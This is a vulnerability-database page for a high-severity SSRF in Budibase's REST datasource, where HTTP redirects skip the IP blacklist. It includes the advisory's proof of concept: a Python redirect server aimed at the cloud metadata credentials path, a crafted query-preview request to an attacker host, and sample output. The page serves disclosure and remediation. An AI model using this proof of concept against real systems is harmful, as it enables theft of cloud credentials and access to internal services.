Skip to main content

Budibase EUVDEUVD-2026-32603

| CVE-2026-45715 HIGH
Server-Side Request Forgery (SSRF) (CWE-918)
2026-05-15 https://github.com/Budibase/budibase GHSA-fgqv-jh4g-pvg2
7.7
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
7.7 HIGH
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
None
Availability
None

Lifecycle Timeline

2
Source Code Evidence Fetched
May 15, 2026 - 18:30 vuln.today
Analysis Generated
May 15, 2026 - 18:30 vuln.today

DescriptionGitHub Advisory

Summary

The REST datasource integration follows HTTP redirects without re-checking the IP blacklist, allowing an authenticated Builder to access internal services (cloud metadata, databases) by redirecting through an attacker-controlled server. The same vulnerability class was already patched in automation steps (fetchWithBlacklist in packages/server/src/automations/steps/utils.ts) but the REST integration was missed.

Details

Vulnerable file: packages/server/src/integrations/rest.ts, lines 754-778

The _req() method checks the request URL against the IP blacklist at line 754, then calls fetch(url, input) at line 778. No redirect: "manual" option is set, so undici's fetch defaults to redirect: "follow", automatically following HTTP 301/302/307 redirects without re-validating the redirect target against the blacklist.

typescript
// Line 754 - blacklist check on original URL only
if (await blacklist.isBlacklisted(url)) {
  throw new Error("URL is blocked or could not be resolved safely.")
}

// Line 778 - fetch follows redirects, NO re-check on redirect target
response = await fetch(url, input)

The automation steps already implement the correct fix in packages/server/src/automations/steps/utils.ts (lines 100-136) via fetchWithBlacklist(), which sets redirect: "manual" and re-checks the blacklist on every redirect hop. The REST integration does not use this safe wrapper.

Relevant prior fix commits on the automation side:

  • 6cfa3bcca3 - "fix(server): enforce outbound blacklist in webhook automation steps"
  • e7d47625be - "Fix automation webhook blacklist redirect bypass"

PoC

Step 1 - Set up a redirect server (attacker-controlled):

python
from http.server import HTTPServer, BaseHTTPRequestHandler

class RedirectHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(302)
        self.send_header('Location', 'http://169.254.169.254/latest/meta-data/iam/security-credentials/')
        self.end_headers()

HTTPServer(('0.0.0.0', 8080), RedirectHandler).serve_forever()

Step 2 - As a Builder, create a REST datasource pointing to the attacker's server.

Step 3 - Preview a query:

http
POST /api/queries/preview HTTP/1.1
Host: <budibase-instance>
Content-Type: application/json
Cookie: <builder-session>
x-budibase-app-id: <app-id>

{
  "datasourceId": "<rest-datasource-id>",
  "queryVerb": "read",
  "fields": {
    "path": "http://<attacker-ip>:8080/",
    "queryString": "",
    "headers": {},
    "bodyType": "none",
    "requestBody": ""
  },
  "parameters": [],
  "transformer": "return data",
  "name": "ssrf-test",
  "schema": {}
}

Step 4 - The blacklist check passes (attacker IP is public), undici follows the 302 redirect to the internal target, and the response is returned:

json
{
  "rows": [{
    "couchdb": "Welcome",
    "version": "3.3.3",
    "uuid": "a84d3353128485a22973a759df2387bc"
  }]
}

Tested and confirmed on Budibase v3.34.6 running locally with default blacklist active.

Impact

  • Cloud credential theft: On AWS/GCP/Azure instances, attacker accesses 169.254.169.254 to steal IAM credentials or service account tokens.
  • Internal service access: CouchDB (:4005), Redis (:6379), MinIO (:4004), and other internal services become accessible
  • Bypasses explicit security control: The IP blacklist exists specifically to prevent this, and works correctly for direct access - only the redirect path is unprotected.
  • Already-known vulnerability class: This was previously identified and fixed in automation steps (commits 6cfa3bcca3, e7d47625be) but the REST datasource integration was not patched.

AnalysisAI

Budibase's REST datasource integration before version 3.38.1 bypasses IP blacklist security controls through HTTP redirect following. Authenticated Builder-level users can exploit this to access cloud metadata services and internal databases by redirecting requests through attacker-controlled servers, potentially stealing AWS/GCP/Azure credentials. This vulnerability class was previously fixed in automation steps but the REST integration was overlooked, creating an inconsistent security posture.

Technical ContextAI

Budibase is a low-code platform (npm package @budibase/server) that allows users to create REST datasources for external API integration. The vulnerability exists in the _req() method within packages/server/src/integrations/rest.ts at lines 754-778. The code validates URLs against an IP blacklist to prevent SSRF attacks, but uses undici's fetch() with default redirect: follow behavior. This follows HTTP 301/302/307 redirects without re-validating the redirect target against the blacklist. The root cause is CWE-918 (Server-Side Request Forgery), where user-controlled input influences server-side requests without proper validation of redirect chains.

RemediationAI

Upgrade to Budibase version 3.38.1 or later, which properly validates redirect targets against the IP blacklist. The fix implements redirect: manual handling similar to the existing fetchWithBlacklist wrapper used in automation steps. As a temporary workaround if immediate patching is not possible, restrict Builder role access to trusted users only, monitor REST datasource configurations for suspicious external URLs, and consider implementing network-level controls to block outbound requests from Budibase servers to cloud metadata endpoints (169.254.169.254). Note that workarounds only reduce risk and do not eliminate the vulnerability.

More in Redis

View all
CVE-2026-48172 CRITICAL POC
10.0 May 21

LiteSpeed User-End cPanel Plugin before 2.4.5 allows privilege escalation (possibly to root), as exploited in the wild i

CVE-2025-49844 CRITICAL POC
9.9 Oct 03

UAF in Redis 8.2.1 via crafted Lua scripts by authenticated users. EPSS 12.4%. Patch available.

CVE-2022-0543 CRITICAL POC
10.0 Feb 18

It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific

CVE-2018-11218 CRITICAL POC
9.8 Jun 17

Memory Corruption was discovered in the cmsgpack library in the Lua subsystem in Redis before 3.2.12, 4.x before 4.0.10,

CVE-2025-46817 HIGH POC
7.0 Oct 03

Redis is an open source, in-memory database that persists on disk. Versions 8.2.1 and below allow an authenticated user

CVE-2015-4335 CRITICAL POC
10.0 Jun 09

Redis before 2.8.21 and 3.x before 3.0.2 allows remote attackers to execute arbitrary Lua bytecode via the eval command.

CVE-2016-8339 CRITICAL POC
9.8 Oct 28

A buffer overflow in Redis 3.2.x prior to 3.2.4 causes arbitrary code execution when a crafted command is sent. Rated cr

CVE-2026-27574 CRITICAL POC
9.9 Feb 21

Code injection in OneUptime monitoring via custom JS monitor using vm module. PoC and patch available.

CVE-2021-31649 CRITICAL POC
9.8 Jun 24

In applications using jfinal 4.9.08 and below, there is a deserialization vulnerability when using redis,may be vulnerab

CVE-2020-11981 CRITICAL POC
9.8 Jul 17

An issue was found in Apache Airflow versions 1.10.10 and below. Rated critical severity (CVSS 9.8), this vulnerability

CVE-2018-11219 CRITICAL POC
9.8 Jun 17

An Integer Overflow issue was discovered in the struct library in the Lua subsystem in Redis before 3.2.12, 4.x before 4

CVE-2024-23998 CRITICAL POC
9.6 Jul 05

goanother Another Redis Desktop Manager =<1.6.1 is vulnerable to Cross Site Scripting (XSS) via src/components/Setting.v

Share

EUVD-2026-32603 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy